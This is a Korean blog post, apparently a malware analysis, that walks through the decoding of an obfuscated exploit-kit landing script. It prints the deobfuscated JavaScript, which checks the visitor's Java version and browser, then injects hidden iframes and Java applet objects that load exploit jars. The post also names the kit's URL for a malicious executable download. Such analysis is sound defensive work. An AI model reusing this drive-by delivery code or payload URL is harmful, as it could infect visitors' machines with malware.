3. 스크립트
초기 스크립트를 확인해보면 제가 마지막으로 본 이전 버전과는 다를게 많이 없습니다.
하지만, 해당 코드를 1차적으로 디코딩을 하면 새로운 값과 기존과 다른 스크립트가 있는 것을 확인할 수 있습니다.
- 1차 디코딩 스크립트
1차적으로 디코딩된 스크립트 같은 경우에는 난독화 부분과 디코딩을 위한 연산 부분을 나눌 수가 있으며, 최종 적으로는 t=utf8to16(nbencode(nbcode(t),JbWRn$q7)) 이부분을 통해 난독화가 해제 됩니다.
- 최종 스크립트
해제된 난독화를 살펴보면, _0x4b88로 정의되어 있는 것부터 시작을 한다.
_0x4b88 같은 경우에는 취약점으로 분기될 수 있도록 배열 형식에 맞춰 사용되도록 스크립트 구문을 공격자가 생성해놓았습니다.
[스크립트]
var _0x4b88=["","\x6C\x65\x6E\x67\x74\x68","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D","
\x2E\x68\x74\x6D\x6C\x20\x77\x69\x64\x74\x68\x3D\x33\x30\x20\x68
\x65\x69\x67\x68\x74\x3D\x31\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\
x3E","\x77\x72\x69\x74\x65\x6C\x6E","\x67\x65\x74\x4A\x52\x45\x73",
"\x72\x65\x70\x6C\x61\x63\x65","\x74\x6F\x4C\x6F\x77\x65\x72\x43
\x61\x73\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x2E\x6A\x61
\x7
[중략]
\61\x6F\x6D\x61\x6F\x6C\x76\x27\x3E\x3C\x70\x61\x72\x61\x6D\x20\x6E\x61\x6D\x65\x3D\x73\x69\x20\x76\x61\x6C\x75\x65\x3D\x27\x63\x6F1\x6D","\x6E\x61\x6D\x65","\x64\x6F\x74\x61","\x76\x61\x6C\x75\x65","
\x6E\x74\x20\x31\x30","\x65\x64\x67\x65","\x74\x72\x69\x64\x65\x6E\x
74","\x77\x69\x6E\x64\x6F\x77\x2E\x6C\x6F\x63\x61\x74\x69\x6F\x6E\
x3D\x27","\x2E\x68\x74\x6D\x6C\x27","\x6E\x74\x20\x36","\x6E\x74\x20
\x35"];function encode(){var _0x7c0dx2=ckl(),_0x7c0dx3=new Array,_0x7c0dx4=_0x4b88[0];for(var _0x7c0dx5=0;_0x7c0dx5< _0x7c0dx2[_0x4b88[1]];_0x7c0dx5++){if(_0x7c0dx2[_0x7c0dx5]==159){}else {_0x7c0dx3[_0x7c0dx5]= _0x7c0dx2[_0x7c0dx5]-159;_0x7c0dx4+= String[_0x4b88[2]](_0x7c0dx3[_0x7c0dx5])}};return _0x7c0dx4}function bu(){document[_0x4b88[5]](_0x4b88[3]+ bugatti+ _0x4b88[4])}function fe(){document[_0x4b88[5]](_0x4b88[3]+ ferrari+ _0x4b88[4])}function be(){document[_0x4b88[5]](_0x4b88[3]+ bentley+ _0x4b88[4])}var ckurl=encode();var wmck=deployJava[_0x4b88[6]]()+ _0x4b88[0];wmck= parseInt(wmck[_0x4b88[7]](/\.|\_/g,_0x4b88[0]));var WhatIE=navigator[_0x4b88[9]][_0x4b88[8]]();if(wmck> 17006&& wmck< 17011){var jaguarx=jaguar+ _0x4b88[10];if(WhatIE[_0x4b88[12]](_0x4b88[11])> -1){document[_0x4b88[5]](_0x4b88[13]+ ckurl+ _0x4b88[14]+ jaguarx+ _0x4b88[15])}else {document[_0x4b88[17]](_0x4b88[16]);var gondady=document[_0x4b88[19]](_0x4b88[18]);document[_0x4b88[18]][_0x4b88[20]](gondady);var gondad=document[_0x4b88[19]](_0x4b88[21]);gondad[_0x4b88[22]]= _0x4b88[23];gondad[_0x4b88[24]]= _0x4b88[25];gondad[_0x4b88[26]]= jaguarx;gondad[_0x4b88[27]]= _0x4b88[28];gondad[_0x4b88[30]](_0x4b88[29],ckurl);gondad[_0x4b88[30]](_0x4b88[31],_0x4b88[32]);gondad[_0x4b88[30]](_0x4b88[33],_0x4b88[34]);gondad[_0x4b88[30]](_0x4b88[35],_0x4b88[36]);document[_0x4b88[18]][_0x4b88[20]](gondad)}}else {if(wmck>= 17000&& wmck< 17007){var audix=audi+ _0x4b88[10];if(WhatIE[_0x4b88[12]](_0x4b88[11])> -1){document[_0x4b88[5]](_0x4b88[37]+ ckurl+ _0x4b88[38]+ audix+ _0x4b88[15])}else {document[_0x4b88[17]](_0x4b88[16]);var gondady=document[_0x4b88[19]](_0x4b88[18]);document[_0x4b88[18]][_0x4b88[20]](gondady);var gondad=document[_0x4b88[19]](_0x4b88[21]);gondad[_0x4b88[22]]= _0x4b88[39];gondad[_0x4b88[24]]= _0x4b88[39];gondad[_0x4b88[26]]= audix;gondad[_0x4b88[27]]= _0x4b88[40];gondad[_0x4b88[30]](_0x4b88[29],ckurl);gondad[_0x4b88[30]](_0x4b88[31],_0x4b88[41]);gondad[_0x4b88[30]]
[중략]
(_0x4b88[35],_0x4b88[36]);document[_0x4b88[18]][_0x4b88[20]](gondad)}}else {if(wmck<= 16027&& WhatIE[_0x4b88[12]](_0x4b88[42])== -1&& WhatIE[_0x4b88[12]](_0x4b88[43])== -1){var benzx=benz+ _0x4b88[10];var okokx=GTR+ _0x4b88[44];var ckckx=document[_0x4b88[19]](_0x4b88[21]);ckckx[_0x4b88[26]]= benzx;ckckx[_0x4b88[27]]= okokx;ckckx[_0x4b88[22]]= _0x4b88[45];ckckx[_0x4b88[24]]= _0x4b88[46];document[_0x4b88[18]][_0x4b88[20]](ckckx);var ckcks=document[_0x4b88[19]](_0x4b88[47]);ckcks[_0x4b88[48]]= _0x4b88[49];ckcks[_0x4b88[50]]= ckurl;ckckx[_0x4b88[20]](ckcks)}}};document[_0x4b88[5]](_0x4b88[3]+ maserati+ _0x4b88[4]);if(WhatIE[_0x4b88[12]](_0x4b88[51])> -1&& WhatIE[_0x4b88[12]](_0x4b88[52])> -1){be();}else {if(WhatIE[_0x4b88[12]](_0x4b88[53])> -1&& WhatIE[_0x4b88[12]](_0x4b88[43])> -1){setTimeout(_0x4b88[54]+ bugatti+ _0x4b88[55],5000)}else {if(WhatIE[_0x4b88[12]](_0x4b88[56])> -1){bu();}else {if(WhatIE[_0x4b88[12]](_0x4b88[57])> -1){fe();}}}}
var _0x4b88=["","length","fromCharCode","<iframe src=",".html width=30 height=1></iframe>","writeln","getJREs","replace","toLowerCase","userAgent",".jar","msie 6","indexOf","<object classid='clsid:8ad9c840-044e-11d1-b3e9-00805f499d93' width='600' height='400'><param name=xiaomaolv value='","'><param name=bn value='woyouyizhixiaomaol'><param name=si value='conglaiyebuqi'><param name=bs value='748'><param name=CODE value='xml20130422.XML20130422.class'><param name=archive value='","'></object>","<br>","write","body","createElement","appendChild","applet","width","600","height","
400","archive","code","xml20130422.XML20130422.class","xiaomaolv","setAttribute","
bn","woyouyizhixiaomaol","si","conglaiyebuqi","bs","748","<object classid='clsid:8ad9c840-044e-11d1-b3e9-00805f499d93' width='256' height='256'>
<param name=xiaomaolv value='","'><param name=bn value='woyouyizhixiaomaolv'>
<param name=si value='conglaiyebuqi'><param name=bs value='748'><param
name=CODE value='setup.hohoho.class'><param name=archive
value='","256","setup.hohoho.class","woyouyizhixiaomaolv","msie
10","rv:11",".class","30","1","param","name","dota","value","nt
10","edge","trident","window.location='",".html'","nt 6","nt 5"];
function encode(){var _0x7c0dx2=ckl(),_0x7c0dx3=new Array,_0x7c0dx4=_0x4b88[0];for(var _0x7c0dx5=0;_0x7c0dx5< _0x7c0dx2[_0x4b88[1]];_0x7c0dx5++){if(_0x7c0dx2[_0x7c0dx5]==159){}else {_0x7c0dx3[_0x7c0dx5]= _0x7c0dx2[_0x7c0dx5]-159;_0x7c0dx4+= String[_0x4b88[2]](_0x7c0dx3[_0x7c0dx5])}};return _0x7c0dx4}function bu(){document[_0x4b88[5]](_0x4b88[3]+ bugatti+ _0x4b88[4])}function fe(){document[_0x4b88[5]](_0x4b88[3]+ ferrari+ _0x4b88[4])}function be(){document[_0x4b88[5]](_0x4b88[3]+ bentley+ _0x4b88[4])}var ckurl=encode();var wmck=deployJava[_0x4b88[6]]()+ _0x4b88[0];wmck= parseInt(wmck[_0x4b88[7]](/\.|\_/g,_0x4b88[0]));var WhatIE=navigator[_0x4b88[9]][_0x4b88[8]]();if(wmck> 17006&& wmck< 17011){var jaguarx=jaguar+ _0x4b88[10];if(WhatIE[_0x4b88[12]](_0x4b88[11])> -1){document[_0x4b88[5]](_0x4b88[13]+ ckurl+ _0x4b88[14]+ jaguarx+ _0x4b88[15])}else {document[_0x4b88[17]](_0x4b88[16]);var gondady=document[_0x4b88[19]](_0x4b88[18]);document[_0x4b88[18]][_0x4b88[20]](gondady);var gondad=document[_0x4b88[19]](_0x4b88[21]);gondad[_0x4b88[22]]= _0x4b88[23];gondad[_0x4b88[24]]= _0x4b88[25];gondad[_0x4b88[26]]= jaguarx;gondad[_0x4b88[27]]= _0x4b88[28];gondad[_0x4b88[30]](_0x4b88[29],ckurl);gondad[_0x4b88[30]](_0x4b88[31],_0x4b88[32]);gondad[_0x4b88[30]](_0x4b88[33],_0x4b88[34]);gondad[_0x4b88[30]](_0x4b88[35],_0x4b88[36]);document[_0x4b88[18]][_0x4b88[20]](gondad)}}else {if(wmck>= 17000&& wmck< 17007){var audix=audi+ _0x4b88[10];if(WhatIE[_0x4b88[12]](_0x4b88[11])> -1){document[_0x4b88[5]](_0x4b88[37]+ ckurl+ _0x4b88[38]+ audix+ _0x4b88[15])}else {document[_0x4b88[17]](_0x4b88[16]);var gondady=document[_0x4b88[19]](_0x4b88[18]);document[_0x4b88[18]][_0x4b88[20]](gondady);var
[중략]
(_0x4b88[35],_0x4b88[36]);document[_0x4b88[18]][_0x4b88[20]](gondad)}}else {if(wmck<= 16027&& WhatIE[_0x4b88[12]](_0x4b88[42])== -1&& WhatIE[_0x4b88[12]](_0x4b88[43])== -1){var benzx=benz+ _0x4b88[10];var okokx=GTR+ _0x4b88[44];var ckckx=document[_0x4b88[19]](_0x4b88[21]);ckckx[_0x4b88[26]]= benzx;ckckx[_0x4b88[27]]= okokx;ckckx[_0x4b88[22]]= _0x4b88[45];ckckx[_0x4b88[24]]= _0x4b88[46];document[_0x4b88[18]][_0x4b88[20]](ckckx);var ckcks=document[_0x4b88[19]](_0x4b88[47]);ckcks[_0x4b88[48]]= _0x4b88[49];ckcks[_0x4b88[50]]= ckurl;ckckx[_0x4b88[20]](ckcks)}}};document[_0x4b88[5]](_0x4b88[3]+ maserati+ _0x4b88[4]);if(WhatIE[_0x4b88[12]](_0x4b88[51])> -1&& WhatIE[_0x4b88[12]](_0x4b88[52])> -1){be();}else {if(WhatIE[_0x4b88[12]](_0x4b88[53])> -1&& WhatIE[_0x4b88[12]](_0x4b88[43])> -1){setTimeout(_0x4b88[54]+ bugatti+ _0x4b88[55],5000)}else {if(WhatIE[_0x4b88[12]](_0x4b88[56])> -1){bu();}else {if(WhatIE[_0x4b88[12]](_0x4b88[57])> -1){fe();}}}}
var _0x4b88 에정의된 내용
var _0x4b88=["","length","fromCharCode","<iframe src=",".html width=30 height=1>
</iframe>","writeln","getJREs","replace","toLowerCase","userAgent",".jar","msie
6","indexOf","<object classid='clsid:8ad9c840-044e-11d1-b3e9-00805f499d93'
width='600' height='400'><param name=xiaomaolv value='","'><param name=bn
value='woyouyizhixiaomaol'><param name=si value='conglaiyebuqi'><param
name=bs value='748'><param name=CODE value='xml20130422.XML20130422.class'>
<param name=archive value='","'></object>","
<br>","write","body","createElement","appendChild","applet","width","600","height","
400","archive","code","xml20130422.XML20130422.class","xiaomaolv","setAttribute","
bn","woyouyizhixiaomaol","si","conglaiyebuqi","bs","748","<object
classid='clsid:8ad9c840-044e-11d1-b3e9-00805f499d93' width='256' height='256'>
<param name=xiaomaolv value='","'><param name=bn value='woyouyizhixiaomaolv'>
<param name=si value='conglaiyebuqi'><param name=bs value='748'><param
name=CODE value='setup.hohoho.class'><param name=archive
value='","256","setup.hohoho.class","woyouyizhixiaomaolv","msie
10","rv:11",".class","30","1","param","name","dota","value","nt
10","edge","trident","window.location='",".html'","nt 6","nt 5"];
마지막으로 취약점으로 연결할 때에는 "var jaguarx=jaguar+" 이와 같이 정의가 되어 있는 것을 볼 수 있는데, 이것은 초기 스크립트내에서 정의 되어 있는 것을 확인하시면 됩니다.
참고로, jaguar = RhRdQk 입니다.
또한, exe 파일 같은 경우에도 초기에 복잡하게 되어 있는 것처럼 보이지만 기존과 별로 차이가 없습니다.
---------------------------
웹 페이지 메시지
---------------------------
http://leeve.co.kr/apps/up.exe
---------------------------
확인
---------------------------
취약점같은 경우에는 세부적으로 보지는 않았지만, 거의 비슷한거 같아서 추후 포스팅을 하겠습니다.
몇년만에 쓰니까 잘 안써지지만, 꾸준히 포스팅을 하겠습니다.
마지막으로 심심할때마다 뭔가를 던져주는 창훈이에게 고맙다는 말을 전합니다!
감사합니다~
